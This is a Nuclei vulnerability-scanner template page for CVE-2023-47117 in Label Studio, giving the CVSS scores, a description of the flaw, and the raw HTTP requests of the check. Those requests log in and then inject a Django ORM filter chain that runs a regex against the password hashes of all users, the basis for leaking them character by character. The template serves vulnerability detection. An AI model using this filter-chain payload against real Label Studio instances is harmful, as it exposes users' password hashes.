
Label Studio - Sensitive Information Exposure

2024-07-08 11:49:10
ProjectDiscovery
github.com
Tags: label studio, sensitive information exposure, django orm, filter chain, query manipulation, cve2023, oss, authenticated

CVSS3: 7.5
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score: 6.5
Confidence: Low
EPSS: 0.119
Percentile: 95.4%

An attacker can construct a filter chain that filters tasks on sensitive fields of all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of the query are controlled by the ORM filter, an attacker can leak these sensitive fields character by character.

id: CVE-2023-47117

info:
  name: Label Studio - Sensitive Information Exposure
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character.
  reference:
    - https://security.snyk.io/vuln/SNYK-PYTHON-LABELSTUDIO-6056277
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47117
    - https://github.com/elttam/publications
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-47117
    cwe-id: CWE-200
    epss-score: 0.0009
    epss-percentile: 0.38398
    cpe: cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: humansignal
    product: label_studio
    shodan-query: http.favicon.hash:-1649949475
  tags: cve,cve2023,label_studio,oss,exposure,authenticated

variables:
  Task_id: "{{task}}"
  Project_id: "{{project}}"

http:
  - raw:
      - |
        GET /user/login/ HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /user/login/?next=/projects/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrfmiddlewaretoken={{csrf}}&email={{username}}&password={{password}}&persist_session=on

      - |
        PATCH /api/dm/views/{{Task_id}}?interaction=filter&project={{Project_id}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"id":{{Task_id}},"data":{"title":"Tasks","ordering":[],"type":"list","target":"tasks","filters":{"conjunction":"or","items":[{"filter":"filter:tasks:updated_by__active_organization__active_users__password","operator":"regex","value":"^pbkdf2_sha256\\$260000\\$","type":"String"}]},"hiddenColumns":{"explore":[],"labeling":[]},"columnsWidth":{},"columnsDisplayType":{},"gridWidth":4,"search_text":null},"project":"{{Project_id}}"}

      - |
        GET /api/tasks?page=1&page_size=30&view={{Task_id}}&interaction=filter&project={{Project_id}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_4, "completed_at", "file_upload", "annotators")'
          - 'status_code_3==200 && status_code_4==200'
          - 'contains(header_4, "application/json")'
        condition: and

    extractors:
      - type: regex
        part: body
        name: csrf
        group: 1
        regex:
          - 'me="csrfmiddlewaretoken" value="([a-zA-Z0-9]+)">'
        internal: true
# digest: 4a0a00473045022100efb2bff232c70a7681dabfdbe49a60c516fcd5f5e446af96976aa8295a59d6b20220612431a6a43f670e2023f79605bdb673f619d459e4d74126b8bfc430ff91f9af:922c64590222798bb761d5b6d8e72950